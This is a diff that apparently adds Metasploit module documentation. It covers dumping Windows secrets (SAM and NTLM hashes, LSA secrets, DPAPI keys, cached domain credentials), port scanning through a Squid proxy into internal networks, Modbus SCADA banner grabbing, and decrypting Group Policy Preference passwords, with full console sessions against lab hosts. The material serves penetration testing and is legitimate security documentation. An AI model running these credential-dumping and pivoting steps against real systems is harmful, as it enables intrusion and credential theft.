+RHOSTS => 192.68.43.12
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser msfuser
+SMBUser => msfuser
+msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass mypasswd
+SMBPass => mypasswd
+msf6 auxiliary(gather/windows_secrets_dump) > run
+[*] Running module against 192.68.43.12
+
+[*] 192.68.43.12:445 - Service RemoteRegistry is in stopped state
+[*] 192.68.43.12:445 - Starting service...
+[*] 192.68.43.12:445 - Retrieving target system bootKey
+[+] 192.68.43.12:445 - bootKey: 0x3d354aa5e14d4360a1cc378a9e47338c
+[*] 192.68.43.12:445 - Saving remote SAM database
+[*] 192.68.43.12:445 - Dumping SAM hashes
+[*] 192.68.43.12:445 - Password hints:
+No users with password hints on this system
+[*] 192.68.43.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b7759c83c817e8b0082fb322bce0073b:::
+msfuser:1001:aad3b435b51404eeaad3b435b51404ee:035ad5f5a5c251c6fc3ba367bee86858:::
+[*] 192.68.43.12:445 - Saving remote SECURITY database
+[*] 192.68.43.12:445 - Decrypting LSA Key
+[*] 192.68.43.12:445 - Dumping LSA Secrets
+$MACHINE.ACC
+MYDOMAIN\MYDESKTOP$:aes256-cts-hmac-sha1-96:8f84e173f9a44708b56806e3d5ee9fa4d21c8edd0da7d29d64cf6122de399b07
+MYDOMAIN\MYDESKTOP$:aes128-cts-hmac-sha1-96:324719fca31fb90274acbd0bf07abf00
+MYDOMAIN\MYDESKTOP$:des-cbc-md5:7561afef18d6e7bb
+MYDOMAIN\MYDESKTOP$:aad3b435b51404eeaad3b435b51404ee:0cb18b83ab17e808b6604175784e8ec2:::
+
+DPAPI_SYSTEM
+dpapi_machinekey: 0xa197fe18d264c79b0996b3a987fcd6ea3b6191a6
+dpapi_userkey: 0xab025408f16dc46e6ba79a559751ea4890daf97b
+
+L$ASP.NETAutoGenKeysV44.0.30319.0
+09 5a a2 cf 23 a2 09 ee 4e 55 7b e4 53 98 5c 6c    |.Z..#...NU{.S.\l|
+6d cb 41 00 c8 18 4a 58 95 15 c6 56 98 fe da 79    |m.A...JX...V...y|
+71 d8 43 50 6f 23 f7 0b b9 97 50 d8 b2 a4 4c c9    |q.CPo#....P...L.|
+43 e6 45 23 ec ec 43 72 8c 1f 50 ad 52 a2 64 92    |C.E#..Cr..P.R.d.|
+4a 03 8e be b6 fc 85 4b 65 e3 d0 c7 66 34 0b 14    |J......Ke...f4..|
+13 ae e7 13 c8 25 6b f1 be 55 a4 fe de fa 4b 1d    |.....%k..U....K.|
+0a f5 4d 68 ea 3c 3b 65 d1 69 eb 70 5b 7d 35 1c    |..Mh.<;e.i.p[}5.|
+97 d6 e0 d1 15 65 4e 52 dc 1e 11 9e 35 6a 82 59    |.....eNR....5j.Y|
+30 98 e1 d2 64 0e 2c 2b 4c dd e6 fd 02 36 21 c1    |0...d.,+L....6!.|
+54 e0 18 7c e0 56 ee 25 4b ab b9 75 70 d2 cf c9    |T..|.V.%K..up...|
+38 8e 06 20 31 75 ca 52 d3 9f 6d 99 80 9c f1 ab    |8.. 1u.R..m.....|
+56 51 e3 de 62 be d4 bb ce f7 6b 9c f5 88 74 a7    |VQ..b.....k...t.|
+54 29 51 47 3b e2 9b 7a                            |T)QG;..z|
+Hex string: 095aa2cf23a209ee4e557be453985c6c6dcb4100c8184a589515c65698feda7971d843506f23f70bb99750d8b2a44cc943e64523ecec43728c1f50ad52a264924a038ebeb6fc854b65e3d0c766340b1413aee713c8256bf1be55a4fedefa4b1d0af54d68ea3c3b65d169eb705b7d351c97d6e0d115654e52dc1e119e356a82593098e1d2640e2c2b4cdde6fd023621c154e0187ce056ee254babb97570d2cfc9388e06203175ca52d39f6d99809cf1ab5651e3de62bed4bbcef76b9cf58874a7542951473be29b7a
+
+NL$KM
+40 76 27 cd 14 f9 b3 6e a5 19 fd 03 bd c7 d9 99    |@v'....n........|
+f2 b0 91 78 44 80 e7 b3 7d b6 4f 26 0a 61 8c 6f    |...xD...}.O&.a.o|
+c5 20 e2 65 de ef 98 13 92 e8 db c9 51 3b 5a c2    |. .e........Q;Z.|
+fd 19 66 e6 e9 cd 4f 11 ec 08 82 1b 16 be 41 38    |..f...O.......A8|
+Hex string: 407627cd14f9b36ea519fd03bdc7d999f2b091784480e7b37db64f260a618c6fc520e265deef981392e8dbc9513b5ac2fd1966e6e9cd4f11ec08821b16be4138
+
+[*] 192.68.43.12:445 - Decrypting NL$KM
+[*] 192.68.43.12:445 - Dumping cached hashes
+[*] 192.68.43.12:445 - Hashes are in 'mscash2' format
+MYDOMAIN/msfuser:$DCC2$10240#msfuser#86d8081dd11a232080037a83f2165732:MYDOMAIN.INTERNAL:MYDOMAIN
+
+[*] 192.68.43.12:445 - Cleaning up...
+[*] 192.68.43.12:445 - Stopping service RemoteRegistry...
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/windows_secrets_dump) > hosts
+
+Hosts
+=====
+
+address        mac  name             os_name  os_flavor  os_sp  purpose  info  comments
+-------        ---  ----             -------  ---------  -----  -------  ----  --------
+192.68.43.12       MYDESKTOP  Unknown                    device
+
+msf6 auxiliary(gather/windows_secrets_dump) > services
+Services
+========
+
+host           port  proto  name  state  info
+----           ----  -----  ----  -----  ----
+192.68.43.12  445   tcp    smb   open   Module: auxiliary/gather/windows_secrets_dump, last negotiated version: SMBv3 (dialect = 0x0311)
+
+msf6 auxiliary(gather/windows_secrets_dump) > creds
+Credentials
+===========
+
+host          origin        service        public               private                                                                                          realm     private_type        JtR Format
+----          ------        -------        ------               -------                                                                                          -----     ------------        ----------
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\msfuser     MYDOMAIN/msfuser:$DCC2$10240#msfuser#86d8081dd11a232080037a83f2165732:MYDOMAIN.INTE (TRUNCATED)  MYDOMAIN  Nonreplayable hash  mscash2
+192.68.43.12  192.68.43.12  445/tcp (smb)  Guest                aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  Administrator        aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  WDAGUtilityAccount   aad3b435b51404eeaad3b435b51404ee:b7759c83c817e8b0082fb322bce0073b                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  msfuser              aad3b435b51404eeaad3b435b51404ee:035ad5f5a5c251c6fc3ba367bee86858                                          NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  aad3b435b51404eeaad3b435b51404ee:0cb18b83ab17e808b6604175784e8ec2                                MYDOMAIN  NTLM hash           nt,lm
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  MYDOMAIN\MYDESKTOP$:aes256-cts-hmac-sha1-96:8f84e173f9a44708b56806e3d5ee9fa4d21c8ed (TRUNCATED)  MYDOMAIN  Password
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  MYDOMAIN\MYDESKTOP$:aes128-cts-hmac-sha1-96:324719fca31fb90274acbd0bf07abf00                     MYDOMAIN  Password
+192.68.43.12  192.68.43.12  445/tcp (smb)  MYDOMAIN\MYDESKTOP$  MYDOMAIN\MYDESKTOP$:des-cbc-md5:7561afef18d6e7bb                                                 MYDOMAIN  Password
+192.68.43.12  192.68.43.12  445/tcp (smb)  DefaultAccount       aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                                          NTLM hash           nt,lm
+
+msf6 auxiliary(gather/windows_secrets_dump) > notes
+
+Notes
+=====
+
+ Time                     Host          Service  Port  Protocol  Type               Data
+ ----                     ----          -------  ----  --------  ----               ----
+ 2020-08-13 12:20:16 UTC  192.68.43.12  smb      445   tcp       host.boot_key      "3d354aa5e14d4360a1cc378a9e47338c"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       host.lsa_key       "0483f343addb39221136da0a0f52397aef02e6ee5d8bd05d49390ab97e05dc45"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       dpapi.machine_key  "a197fe18d264c79b0996b3a987fcd6ea3b6191a6"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       dpapi.user_key     "ab025408f16dc46e6ba79a559751ea4890daf97b"
+ 2020-08-13 12:20:20 UTC  192.68.43.12  smb      445   tcp       host.nlkm_key      "40000000000000000000000000000000407627cd14f9b36ea519fd03bdc7d999f2b091784480e7b37db64f260a618c6fc520e265deef981392e8dbc9513b5ac2fd1966e6e9cd4f11ec08821b16be4138e0dd79c41522331dcc5005d731c1738f"
+ 2020-08-13 12:20:21 UTC  192.68.43.12  smb      445   tcp       user.cache_info    "Username: msfuser; Iteration count: 10 -> real 10240; Last login: 2020-08-01 20:00:02 +0100; DNS Domain Name: MYDOMAIN.INTERNAL; UPN: msfuser@mydomain.internal; Effective Name: msfuser; Full Name: msfuser; Logon Script: ; Profile Path: ; Home Directory: ; Home Directory Drive: ; User ID: 1004; Primary Group ID: 513; Additional groups: 513; Logon domain name: MYDOMAIN"
+```
@@ -0,0 +1,283 @@
+## Description
+
+A exposed Squid proxy will usually allow an attacker to make requests on their behalf. If misconfigured, this may give the attacker information about devices that they cannot normally reach. For example, an attacker may be able to make requests for internal IP addresses against an open Squid proxy exposed to the Internet, therefore performing a port scan against the internal network.
+
+The `auxiliary/scanner/http/open_proxy` module can be used to test for open proxies, though a Squid proxy does not have to be on the open Internet in order to allow for pivoting (e.g. an Intranet Squid proxy which allows the attack to pivot to another part of the internal network).
+
+This module will not be able to scan network ranges or ports denied by Squid ACLs. Fortunately it is possible to detect whether a host was up and the port was closed, or if the request was blocked by an ACL, based on the response Squid gives. This feedback is provided to the user in meterpreter `VERBOSE` output, otherwise only open and permitted ports are printed.
+
+
+### Vulnerable Application Setup
+
+The [official Squid configuration documentation](https://wiki.squid-cache.org/SquidFaq/ConfiguringSquid) covers the significant flexibility of the Squid proxy. For this module, the most relevant core Squid configuration lines usually looks like this (default for version 3.5):
+
+```
+http_port 3128
+
+acl localnet src 10.0.0.0/8     # RFC1918 possible internal network
+acl localnet src 172.16.0.0/12  # RFC1918 possible internal network
+acl localnet src 192.168.0.0/16 # RFC1918 possible internal network
+acl localnet src fc00::/7       # RFC 4193 local private network range
+acl localnet src fe80::/10      # RFC 4291 link-local (directly plugged) machines
+
+acl SSL_ports port 443
+
+acl Safe_ports port 80          # http
+acl Safe_ports port 21          # ftp
+acl Safe_ports port 443         # https
+acl Safe_ports port 70          # gopher
+acl Safe_ports port 210         # wais
+acl Safe_ports port 280         # http-mgmt
+acl Safe_ports port 488         # gss-http
+acl Safe_ports port 591         # filemaker
+acl Safe_ports port 777         # multiling http
+acl Safe_ports port 1025-65535  # unregistered ports
+
+acl CONNECT method CONNECT
+
+http_access deny !Safe_ports
+http_access deny CONNECT !SSL_ports
+http_access allow localhost manager
+http_access deny manager
+
+#
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+#
+
+http_access allow localnet
+http_access allow localhost
+http_access deny all
+```
+
+In short, this opens port 3128 for proxying from `localhost` or a `localnet` ranges to any port in `Safe_ports`, and allows SSL CONNECT requests to be made to `SSL_ports` (just 443 in this example).
+
+The references to "manager" are referring to a component of Squid which provides management controls and reports displaying statistics about the squid process as it runs, and can show useful information like file descriptors or internal hostnames and IP addresses if the ACL permits access. [See the official docs](https://wiki.squid-cache.org/Features/CacheManager) for more information on the Cache Manager.
+
+As such, you should be able to install Squid with default configuration, and reach through it from an internal network source range to anythin the Squid proxy has a route to. If you wish to test against other ports or network ranges, modify the configuration to suit prior to testing.
+
+
+## Verification Steps
+To test this module, you can try the following:
+
+1. Install Squid
+1. Start the Squid service
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/squid_pivot_scanning`
+1. Set the `RHOSTS` and `RPORT` to be that of Squid's host address and port:
+    1. `set RHOSTS squid.internal`
+    1. `set RPORT 3128`
+1. Set the `RANGE` parameter to be the destination host addresses you wish to port scan.
+    1. `set RANGE 192.168.0.1-192.168.0.2`
+1. (Optional) Set the specific `PORTS` parameter to any ports you wish to port scan on the hosts in `RANGE`.
+    1. `set PORTS 21-23,80,443`
+1. Do: `run`
+1. You should see the module attempt to connect to the proxy, and then first port of the first host in `RANGE`. Ports will be tested sequentially until the end of `PORTS` is reached, at which point it will start from the first port on the next host in `RANGE`.
+
+
+## Options
+Here is a quick overview of each option within the module.
+
+### CANARY_IP
+
+The IP to check if the proxy always answers positively - this IP address should not normally respond.
+
+Default value: `1.2.3.4`
+
+### MANUAL_CHECK
+
+Invoke the canary check, and stop the scan if the Squid proxy server appears to answer positively to every request.
+
+Default value: `true`
+
+### PORTS
+
+The destination TCP ports to scan through the proxy. Ports will be scanned in ascending order.
+
+Note: these must be TCP, this scanner cannot scan other protocols.
+
+### Proxies
+
+This option should not be confused with the Squid proxy you are trying to scan - this is one of the default Meterpreter paramets in which you can specify a proxy chain to use that you require to reach the Squid proxy.
+
+### RANGE
+
+This is the IP range you wish to sca through the Squid proxy. `PORTS` on these hosts will be scanned. Hosts are scanned in ascending order.
+
+### RPORT
+
+This is the port that the Squid proxy is listening on. Squid defaults to 3128.
+
+Default value: `3128`
+
+### SSL
+
+Whether you need to connect to Squid with SSL. This is not normally the case.
+
+Default value: `false`
+
+### THREADS
+
+The number of concurrent threads (max one per Squid host).
+
+Default value: `1`
+
+### VHOST
+
+HTTP server virtual host header to send on requests.
+
+
+## Scenarios and Examples
+The following is a brief demo of a port scan against two hosts (`192.168.0.1` and `192.168.0.2`) through a Squid proxy responding at `10.10.10.100:3128`. You could assume that the Squid host has a public or otherwise reachable IP address, where the `192.168.0.0` network range is not normally reachable to you.
+
+```
+msf6 > use auxiliary/scanner/http/squid_pivot_scanning
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.100
+RHOSTS => 10.10.10.100
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
+RPORT => 3128
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
+PORTS => 21-25,79-81,139,443,445,1433,1521,1723,3389,8080,9100
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 192.168.0.1-192.168.0.2
+RANGE => 192.168.0.1-192.168.0.2
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[+] [10.10.10.100] 192.168.0.1 is alive.
+[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
+[+] [10.10.10.100] 192.168.0.2 is alive.
+[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Setting the `VERBOSE` option will show each port tested and explain the reason for unreachable ports, if known. This can be helpful, as a port might very well be open and responding on a host, however if it is denied by the Squid ACL you will be unable to reach it regardless.
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[*] [10.10.10.100] Verifying manual testing is not required...
+[*] [10.10.10.100] Requesting 192.168.0.1:21
+[+] [10.10.10.100] 192.168.0.1 is alive.
+[*] [10.10.10.100] 192.168.0.1 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:22
+[*] [10.10.10.100] 192.168.0.1:22 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:23
+[*] [10.10.10.100] 192.168.0.1:23 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:24
+[*] [10.10.10.100] 192.168.0.1:24 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:25
+[*] [10.10.10.100] 192.168.0.1:25 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:79
+[*] [10.10.10.100] 192.168.0.1:79 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:80
+[+] [10.10.10.100] 192.168.0.1:80 seems open (HTTP 200, server header: 'nginx/1.14.0 (Ubuntu)').
+[*] [10.10.10.100] Requesting 192.168.0.1:81
+[*] [10.10.10.100] 192.168.0.1:81 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:139
+[*] [10.10.10.100] 192.168.0.1:139 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:443
+[*] [10.10.10.100] 192.168.0.1 is alive but 443 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:445
+[*] [10.10.10.100] 192.168.0.1:445 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.1:1433
+[*] [10.10.10.100] 192.168.0.1 is alive but 1433 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:1521
+[*] [10.10.10.100] 192.168.0.1 is alive but 1521 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:1723
+[*] [10.10.10.100] 192.168.0.1 is alive but 1723 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:3389
+[*] [10.10.10.100] 192.168.0.1 is alive but 3389 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:8080
+[*] [10.10.10.100] 192.168.0.1 is alive but 8080 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.1:9100
+[*] [10.10.10.100] 192.168.0.1 is alive but 9100 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:21
+[+] [10.10.10.100] 192.168.0.2 is alive.
+[*] [10.10.10.100] 192.168.0.2 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:22
+[*] [10.10.10.100] 192.168.0.2:22 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:23
+[*] [10.10.10.100] 192.168.0.2:23 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:24
+[*] [10.10.10.100] 192.168.0.2:24 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:25
+[*] [10.10.10.100] 192.168.0.2:25 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:79
+[*] [10.10.10.100] 192.168.0.2:79 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:80
+[+] [10.10.10.100] 192.168.0.2:80 seems open (HTTP 302 redirect to: 'index.php', server header: 'nginx/1.14.0 (Ubuntu)')
+[*] [10.10.10.100] Requesting 192.168.0.2:81
+[*] [10.10.10.100] 192.168.0.2:81 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:139
+[*] [10.10.10.100] 192.168.0.2:139 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:443
+[*] [10.10.10.100] 192.168.0.2 is alive but 443 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:445
+[*] [10.10.10.100] 192.168.0.2:445 likely blocked by ACL.
+[*] [10.10.10.100] Requesting 192.168.0.2:1433
+[*] [10.10.10.100] 192.168.0.2 is alive but 1433 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:1521
+[*] [10.10.10.100] 192.168.0.2 is alive but 1521 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:1723
+[*] [10.10.10.100] 192.168.0.2 is alive but 1723 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:3389
+[*] [10.10.10.100] 192.168.0.2 is alive but 3389 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:8080
+[*] [10.10.10.100] 192.168.0.2 is alive but 8080 is closed.
+[*] [10.10.10.100] Requesting 192.168.0.2:9100
+[*] [10.10.10.100] 192.168.0.2 is alive but 9100 is closed.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+If the Squid administrator has made the error of having an ACL be too permissive, you might even see more interesting ports. A contrived example is below, note SSH has been added to `Safe_ports`.
+
+```
+acl Safe_ports port 80          # http
+acl Safe_ports port 443         # https
+acl Safe_ports port 21          # ftp
+acl Safe_ports port 22          # ssh
+
+http_access deny !Safe_ports
+http_access allow localhost
+http_access allow localnet
+http_access deny all
+```
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set TARGETS 127.0.0.1
+TARGETS => 127.0.0.1
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
+RANGE => 127.0.0.1
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21-23
+PORTS => 21-23
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+[*] [10.10.10.100] Verifying manual testing is not required...
+[*] [10.10.10.100] Requesting 127.0.0.1:21
+[+] [10.10.10.100] 127.0.0.1 is alive.
+[*] [10.10.10.100] 127.0.0.1 is alive but 21 is closed.
+[*] [10.10.10.100] Requesting 127.0.0.1:22
+[+] [10.10.10.100] 127.0.0.1:22 seems open (HTTP 200, server header: 'unknown').
+[*] [10.10.10.100] Requesting 127.0.0.1:23
+[*] [10.10.10.100] 127.0.0.1:23 likely blocked by ACL.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
+Finally, it is worth knowing that all open discovered ports are saved as services for later viewing:
+
+```
+msf6 auxiliary(scanner/http/squid_pivot_scanning) > services
+Services
+========
+
+host          port  proto  name                   state  info
+----          ----  -----  ----                   -----  ----
+127.0.0.1     22    tcp    unknown                open   SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
+Protocol mismatch.
+192.168.0.1  80    tcp    nginx/1.14.0 (ubuntu)  open   <html><head>...
+192.168.0.2  80    tcp    nginx/1.14.0 (ubuntu)  open   Redirect to: index.php
+```
@@ -0,0 +1,98 @@
+## Vulnerable Application
+
+This module will perform banner grabbing on devices that use the Modbus protocol by sending
+a payload with the function code 43 to read the target device's identification information.
+For more technical information, you can refer to this link: https://en.wikipedia.org/wiki/Modbus#Available_function/command_codes.
+
+By default the service is running on port 502, so any device with this port open could be a potential target.
+
+## Verification Steps
+  1. Do: `use auxiliary/scanner/scada/modbus_banner_grabbing`
+  2. Do: `set RHOST <IP>` where IP is the IP address of the target.
+  3. Do: `run`
+
+The response from the target device may contain several objects. Some of these objects can be seen below:
+
+`vendor name, product code, revision number (in *major version*.*minor version* format), vendor url, product name, model name`
+
+If the target was unable to process the Modbus message, a Modbus exception message will be returned from the target,
+ which will then be output to the screen.
+
+Successful results from the scan will be stored as a `note` in the framework. You can access these notes by typing `note` in the console.
+
+```
+msf5 auxiliary(scanner/scada/modbus_banner_grabbing) > notes
+
+Notes
+=====
+
+ Time                     Host            Service  Port  Protocol  Type                Data
+ ----                     ----            -------  ----  --------  ----                ----
+ 2020-07-06 13:25:50 UTC  192.168.1.1     modbus   502   tcp       modbus.vendorname   "Schneider Electric"
+ 2020-07-06 13:25:50 UTC  192.168.1.1     modbus   502   tcp       modbus.productcode  "BMX NOE 0100"
+ 2020-07-06 13:25:50 UTC  192.168.1.1     modbus   502   tcp       modbus.revision     "V3.10"
+```
+
+## Options
+There are no non-default options for this module.
+
+## Scenarios
+The following scenarios describe some of the responses you may receive from the target:
+
+### Schneider Electric BMX NOE 0100 - Successful Response
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[*] 192.168.1.1:502    - Number of Objects: 3
+[+] 192.168.1.1:502    - VendorName: Schneider Electric
+[+] 192.168.1.1:502    - ProductCode: BMX NOE 0100
+[+] 192.168.1.1:502    - Revision: V3.10
+[*] 192.168.1.1:502    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Schneider Electric BMX NOE 0100 - No Reply
+The target never replied to the attacker's request.
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.2
+RHOSTS => 192.168.1.2
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[-] 192.168.1.2:502      - MODBUS - No reply
+[*] 192.168.1.2:502      - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Schneider Electric BMX NOE 0100 - Network Error
+Some network error occurred, such as a connection error, a network timeout, or the connection was refused.
+Alternatively, the host may be unreachable.
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.3
+RHOSTS => 192.168.1.3
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[-] 192.168.1.3:502     - MODBUS - Network error during payload: The connection timed out (217.71.253.52:502).
+[*] 192.168.1.3:502     - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Schneider Electric BMX NOE 0100 - Modbus Exception Code (i.e. Memory Parity Error)
+
+```
+msf6 > use auxiliary/scanner/scada/modbus_banner_grabbing
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > set RHOSTS 192.168.1.4
+RHOSTS => 192.168.1.4
+msf6 auxiliary(scanner/scada/modbus_banner_grabbing) > run
+
+[-] 192.168.1.4:502      - Memory Parity Error: Slave detected a parity error in memory.
+[*] 192.168.1.4:502      - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,77 @@
+## Vulnerable Application
+
+This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy
+Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES
+key. This module has been tested successfully on a Win2k8 R2 Domain Controller.
+
+### Test Environment
+
+This vulnerability was patched in 2014 but Group Policy Prefence files can still be found in modern environments. Because of that it is
+necessary to have a means to test this vulnerability in a contrived way.
+
+Starting from a Windows Server that has been configured as an Active Directory Domain Controller:
+1. Navigate to: `%SystemRoot%\SYSVOL\sysvol\$domain\Policies` where `$domain` is the name of the domain.
+1. Create a subfolder. These folders typically use UUIDs within braces (e.g. `{31B2F340-016D-11D2-945F-00C04FB984F9}`) but the name does not
+   matter for testing purposes.
+1. In the new a new file (and the necessary parent folders) `MACHINE\Preferences\Groups\Groups.xml`.
+1. Place the contents below in the new `Groups.xml` file.
+
+```
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
+	<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="SuperSecretBackdoor" image="0" changed="2013-04-25 18:36:07" uid="{B5EDB865-34F5-4BD7-9C59-3AEB1C7A68C3}">
+		<Properties action="C" fullName="" description="" cpassword="VBQUNbDhuVti3/GHTGHPvcno2vH3y8e8m1qALVO1H3T0rdkr2rub1smfTtqRBRI3" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="SuperSecretBackdoor"/>
+	</User>
+</Groups>
+```
+
+This example XML data was taken from the unit test.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/smb/smb_enum_gpp`
+1. Do: `set RHOSTS ...`
+1. Do: `set SMBUser ...`
+1. Do: `set SMBPass ...`
+1. Do: `run`
+
+### Windows Server 2019 (Test Setup)
+
+The following example use the contrived setup from the "Test Environment" section.
+
+```
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > use auxiliary/scanner/smb/smb_enum_gpp 
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBUSER smcintyre
+SMBUSER => smcintyre
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/smb/smb_enum_gpp) > run
+
+[*] 192.168.159.10:445    - Connecting to the server...
+[*] 192.168.159.10:445    - Mounting the remote share \\192.168.159.10\SYSVOL'...
+[+] 192.168.159.10:445    - Found Policy Share on 192.168.159.10
+[*] 192.168.159.10:445    - Parsing file: \\192.168.159.10\SYSVOL\msflab.local\Policies\fake\MACHINE\Preferences\Groups\Groups.xml
+[+] 192.168.159.10:445    - Group Policy Credential Info
+============================
+
+ Name               Value
+ ----               -----
+ TYPE               Groups.xml
+ USERNAME           SuperSecretBackdoor
+ PASSWORD           Super!!!Password
+ DOMAIN CONTROLLER  192.168.159.10
+ DOMAIN             msflab.local
+ CHANGED            2013-04-25 18:36:07
+ NEVER_EXPIRES?     1
+ DISABLED           0
+
+[+] 192.168.159.10:445    - XML file saved to: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_microsoft.window_053830.txt
+[+] 192.168.159.10:445    - Groups.xml saved as: /home/smcintyre/.msf4/loot/20200828163158_default_192.168.159.10_smb.shares.file_279441.xml
+[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
